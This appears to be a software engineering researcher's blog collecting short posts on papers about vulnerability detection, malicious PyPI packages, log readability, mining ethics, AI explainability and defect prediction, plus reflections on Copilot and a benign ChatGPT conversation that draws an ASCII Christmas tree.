Vulnerability detection – addressing the #1 problem

https://arxiv.org/pdf/2308.10523.pdf

One of the major issues with vulnerability detection in source code is the unbalanced data. Although there is a lot of known vulnerabilities, the examples of them are rather scarce. SonarQube, as a tool, can detect only ca. 30 vulnerabilities out of over 200,000 existing ones. This paper is about making the job of finding security holes in software code easier and more reliable, even when there’s not a lot of clear-cut examples of what’s bad and what’s not. The main part of the paper is about:

  1. The PILOT model: The researchers came up with a smart model named PILOT that only needs examples of risky code and a bunch of other code where we don’t know if it’s safe or risky. It’s like having a detective who’s really good at spotting something fishy with just a few clues.
  2. How PILOT Works: PILOT has two cool tricks up its sleeve. First, it’s got a keen eye for picking out which pieces of the “unknown” code are probably safe. Second, it learns to tell the difference between safe and risky code in a way that’s not thrown off by a few mistakes in the data.
  3. The Proof is in the Pudding: They tested PILOT with real-world data and found it did a better job than other methods, even when those methods had more information to go on. PILOT was also pretty good at catching mistakes in the data where something was labeled as safe but was actually risky.
  4. Why It Matters: This approach is a game-changer because it means you can still get good at finding security risks even if you don’t have a ton of well-labeled data. It’s like being able to train a super sniffer dog with only a few scents rather than the whole scent library.

In essence, PILOT is like a detective that doesn’t need the whole story to solve the case. It can make do with just the good bits and still crack the code on what’s a security risk and what’s not.

Libraries and security

https://arxiv.org/pdf/2309.11021.pdf

I often use python because of the large ecosystem of libraries. Thanks to these libraries, I do not have to focus on the details of the implementation, but I can focus on the task at hand. However, not all libraries are good, and therefore this paper captured my attention. The study aims to understand the characteristics and lifecycle of malicious code in PyPI by building an automated data collection framework and analyzing a dataset of malicious package files.

Key findings and contributions of the paper include:

  1. Empirical Analysis: The authors conducted an empirical study to understand the characteristics and lifecycle of malicious code in the PyPI ecosystem.
  2. Automated Data Collection: They built an automated data collection framework to gather a high-quality dataset of malicious code from PyPI mirrors and other sources.
  3. Dataset Construction: The dataset includes 4,669 malicious package files, making it one of the largest publicly available datasets of PyPI malicious packages.
  4. Classification Framework: An automated classification framework was developed to categorize the collected malicious code into different types based on their behavior characteristics.
  5. Malicious Behavior: The research found that over 50% of the malicious code exhibits multiple malicious behaviors, with information stealing and command execution being particularly prevalent.
  6. Novel Attack Vectors and Anti-Detection Techniques: The study observed several novel attack vectors and anti-detection techniques used by malicious code.
  7. Impact on End-User Projects: It was revealed that 74.81% of all malicious packages successfully entered end-user projects through source code installation, increasing security risks.
  8. Persistence in Mirror Servers: Many reported malicious packages persist in PyPI mirror servers globally, with over 72% remaining for an extended period after being discovered.
  9. Lifecycle Portrait: The paper sketches a portrait of the malicious code lifecycle in the PyPI ecosystem, reflecting the characteristics of malicious code at different stages.
  10. Suggested Mitigations: The authors present some suggested mitigations to improve the security of the Python open-source ecosystem.

The study is significant as it provides a systematic understanding of the propagation patterns, influencing factors, and potential hazards of malicious code in the PyPI ecosystem. It also offers a foundation for developing more efficient detection methods and improving the security practices within the software supply chain.

Understanding log files…

https://ginolzh.github.io/papers/ASE2023_Log_Message_Readability.pdf

Debugging and testing often require analyses of log files. This means that we need to read a lot of lines of information that can be useful, but at the same time it is difficult to parse it. Therefore, this paper is of interest for those who must read these files once in a while.

This paper investigates the readability of log messages in software logging. The authors conducted a comprehensive study involving interviews with industrial practitioners, manual investigation of log messages in open-source systems, online surveys, and the exploration of automatic classification of log message readability using machine learning.

Key findings and contributions of the paper include:

  1. Practitioners’ Expectations (RQ1): Through interviews, the authors identified three aspects related to log message readability: Structure, Information, and Wording. They also derived specific practices to improve each aspect. Survey participants acknowledged the importance of these aspects, with Information being considered the most critical.
  2. Readability in Open Source Systems (RQ2): A manual investigation of log messages from nine large-scale open-source systems revealed that 38.1% of log messages have inadequate readability, particularly in the aspect of Information.
  3. Automatic Classification (RQ3): The study explored the use of deep learning and machine learning models to automatically classify the readability of log messages. The models achieved a balanced accuracy above 80% on average, indicating their effectiveness.

The paper’s contributions are significant as it is one of the first studies to investigate log message readability through interviews with industrial practitioners. It highlights the prevalence of inadequate readability in log messages within large-scale open-source systems and demonstrates the potential of machine learning models to classify log message readability automatically.

The study provides systematic comprehension of log message readability and offers empirically-derived guidelines to improve developers’ logging practices. It also opens avenues for future research to establish standards for composing log messages.

The authors conclude that their study sheds light on the importance of log message readability and provides a foundation for future work to improve logging practices in software development.

Ethics in data mining

BIld av Tumisu från Pixabay

https://link.springer.com/article/10.1007/s10664-021-10057-7

A lot of software engineering research studies use open source data and mine software repositories. It’s a common practice since it allows to test our hypotheses before asking for previous resources from our collaborating companies. By mining open source data we can also learn whether our study makes sense; we can see it as a pilot study of some sorts.

Mining software repositories has evolved into a popular activity since we got access to repositories like Github. There are even guidelines for assessing this kind of studies, e.g., https://sigsoft.org/EmpiricalStandards/docs/ and we have regulations of what we can do with the open source data – these can be in the form of a license, law (like GDPR or the CCPA) or the need for asking an ethical board for an approval. However, there is also a common sense – not everything that is legal is appropriate or ethical. We always need to ensure that no individual can be a subject to any harm as a result of our actions.

In the article that I want to bring up today, the authors discuss the ethical frameworks for ethical software engineering studies based on open source repositories. We need to make sure that:

  1. We respect the persons, which stresses the need for approval and consent.
  2. Beneficence, which means that we need to minimize the harm, but maximize the benefit.
  3. Justice, which means that we need to consider each individual equally.
  4. Respect for law and public interest, which entails conducting due diligence on which data we can use and in which way.

The most interesting part of this article is the analysis of different cases of mining software repositories. For example, the case of analyzing the code, reviews, commit messages and other types of data in the repositories.

I recommend this article for everyone who considers working with mining software repositories.

What the GPT technology really changes in SE

Image source: pixabay

GPT technology, exemplified by the Github Copilot and its likes, changes software engineering to the ground. There is no doubt that the technology places a new tool in our engineering shed. It allows us to create software with a completely different set-up than what we are used to.

Now, what it really changes is only a few things, but these are very big ones.

  1. Programmers —> designers and architects. GPT can write source code like no other tool on the market. And it only gets better at this. A quick glimpse at the Github Next website gives us a good understanding that this team has only got started. This changes everything we know about engineering software. Bad programmers will disappear over time. Good software designers, architects and software engineers will take their place. They will be fewer in number, but better in quality.
  2. Software development —> software engineering. Designers will no longer get stuck in solving a small bit of a puzzle. GPT will do it for them. Instead of thinking how to write a test case, the designers will think how to test the software in the best possible way. They will focus on the engineering part of the software engineering. Something that I’m teaching my students from day one.
  3. Consultancy —> knowledge hubs. Since programming will become easier and more approachable, we will need people who know how to solve a problem, not how to write a program. This big chunk of business of the consultancy companies will disappear. The consultancy companies will specialize in their domains and in problem-solving.

There will also be other things that will happen. Requirements will not be the same as they are. Testing will be different, architecting will be smarter and management more optimal. Knowledge will be more valued and critical thinking will be needed even more.

Well, this is my end of the academic year blog post. More to come after the summer. Stay safe!

Continuous deployment in systems of systems…

Continuous deployment in software-intensive system-of-systems – ScienceDirect (gu.se)

Interestingly, this is a paper from colleagues of ours from the department. The paper presents how one company – Ericsson – works with continuous deployment of their large software system in 3G RAN (Radio Access Networks). The highlights from the article are as follows:

  • New software field testing and validation activities become continuous.
  • Software deployment should be orchestrated between the constituent system.
  • A pilot customer to partner with is key for success.
  • Companywide awareness and top management support are important.
  • Documentation and active monitoring are critical for continuous deployment.

I like this paper because it presents a practical approach and a good set of practices that can be taken up by other companies.

Transparency and explainability of AI…

Image by Sergey Gricanov from Pixabay

Transparency and explainability of AI systems: From ethical guidelines to requirements – ScienceDirect

In the area of ChatGPT and increasingly larger language models, it is important to understand how these models reason. Not only because we want to put them in safety-critical systems, but mostly because we need to know why they make things up.

In this paper, the authors draw conclusions regarding how to increase the transparency of AI models. In particular, they highlight that:

  • The AI ethical guidelines of 16 organizations emphasize explainability as the core of transparency.
  • When defining explainability requirements, it is important to use multi-disciplinary teams.

The define a four-quandrant model for explainability of requirements and AI systems. The model links four key questions to a number of aspects:

  1. What to explain (e.g., roles and capabilities of AI).
  2. In what kind of situation (e.g., when testing).
  3. Who explains (e.g., AI explains itself).
  4. To whom to explain (e.g., customers).

It’s an interesting reading that takes AI systems to more practical levels and provide the ability to turn explainability into software requirements.

Defect predictions – still valid in 2023…

Image by WikiImages from Pixabay

Industrial applications of software defect prediction using machine learning: A business-driven systematic literature review – ScienceDirect

Wow, when I look at the last entry, it was two months ago. Well, somewhere between the course in embedded systems for my students, delegation to Silicon Valley and all kinds of challenges, the time seemed to pass between my fingers.

Well, nevertheless, I would like to put a highlight to the article from our colleagues who specialize in defect predictions and systematic reviews. The article describes how companies use defect prediction models and when they do it.

It’s a nice sunday reading for those of you who are interested in the topic. It is a good source of best practices as well as a solid source for looking for datasets for defect prediction.

Enjoy your reading!

GitHub Co-pilot and code generation

So, this week’s post is my reflection on the seminar that we hosted last week (the recording is above). It was an eye-opener for me in a few aspects.

For the first, it was the question of ownership of things. Since AI is not a subject in legal cases, it cannot really own anything. I know, AI and computational models are not the same, but for the sake of the argument let’s assume that they are. By the end of the day, it is still a human being that presses the button and generates new source code or comments or what have you. So, the responsibility is still very much on us when we use these tools.

The second, it was the question about the community and why we have open-source software. We certainly do not put our source code openly for someone to profit from it. Attribution and recognition are very important (if not the most important) aspects of any open-source community. So, using their code to create commercial models requires at least some attribution. Why not show which code was used to train these models and show how good the communities really are?

Finally, my main point still stands – we should use these models to become better. They make us so much more productive that we should not go back to the old ways of writing software. Providing suggestions and ideas to programmers can make our software better, shipped faster and potentially more reliable.

However, we need to make sure that we change the way we attribute the software. Myself, I will start to add “co-created by Github Co-pilot and the OSS communities” to my work when I use the tool. Maybe you can do that too? At least to give some attribution back to our countless colleagues who deserve it….

Christmas post from ChatGPT

BIld av Manfred Steger från Pixabay

I think that almost everyone in the field of SE has heard about the new bot – ChatGPT from OpenAI. The bot is capable of writing programs, making conversations and even creating virtual machines.

So, this year I wanted to check what ChatGPT can do. Here is my conversation with it:

M: What are the most important machine learning papers from 2022?

C: I’m sorry, but I don’t have access to papers or other information from 2022 because my knowledge was cut off in 2021. I can tell you about some important machine learning papers from the past, or provide general information about machine learning and how it has evolved over time. Is there something specific you would like to know about machine learning?

M: Ok, how about the most important papers from 2021?

C: I’m sorry, but I am not able to browse the internet and do not have access to information about specific papers or other developments that have occurred since my knowledge cutoff in 2021. However, there are many resources available online that can help you learn about the latest developments in the field of machine learning. Some places you might look for information about the most important machine learning papers from 2021 include scientific journals and conference proceedings, online news sources, and blogs or websites that cover developments in the field of artificial intelligence and machine learning. Additionally, you can check out the proceedings of major machine learning conferences, such as the International Conference on Machine Learning (ICML) and the Conference on Neural Information Processing Systems (NeurIPS), which are typically held each year and showcase the latest research in the field.

M: What is your prediction for machine learning field for 2023?

C: One trend that has been especially prominent in the field of machine learning in recent years is the increasing use of deep learning techniques, which have led to significant advances in a wide range of applications, including image and speech recognition, natural language processing, and autonomous systems. It is likely that this trend will continue in the coming years, as researchers continue to develop and refine deep learning algorithms and apply them to new and challenging problems.

Another trend that is likely to continue in the field of machine learning is the increasing importance of interpretability and explainability. As machine learning models become more sophisticated and are applied to more complex and sensitive tasks, it will be important to understand how they make their predictions and decisions, and to be able to explain these to users and stakeholders. Researchers and practitioners will therefore continue to focus on developing techniques for interpreting and explaining the behavior of machine learning models.

Finally, the field of machine learning will continue to be driven by the availability of large amounts of data and the increasing power and efficiency of computing hardware. As data continues to be generated at an ever-increasing rate, and as hardware capabilities continue to improve, it is likely that machine learning techniques will continue to advance and be applied to a wide range of problems and domains.

M: Ok, then write a program that draws a Christmas tree.

C:

Here is a Python program that uses ASCII art to draw a simple Christmas tree:

def draw_tree():
  print("   /\\")
  print("  /  \\")
  print(" /    \\")
  print("/      \\")
  print("--------")

draw_tree()

This code will output the following tree to the console:

   /\
  /  \
 /    \
/      \
--------

You can customize the appearance of the tree by modifying the print statements. For example, you could add more branches to the tree by adding additional print statements, or you could use different characters to create a more detailed or decorative tree.

Here is an example of a more detailed tree that uses a combination of ASCII art and Unicode characters to create a more realistic-looking tree:

def draw_tree():
  print("    /\\")
  print("   /  \\")
  print("  /    \\")
  print(" /      \\")
  print("/        \\")
  print("----------")
  print("   |||")
  print("   |||")
  print("   |||")

draw_tree()

Summary: well, the conversation is not very deep, not great either, which makes me sleep better at nights, feeling we (software engineers) are still needed in 2023. At least for the time being.

Have a wonderful holiday everyone!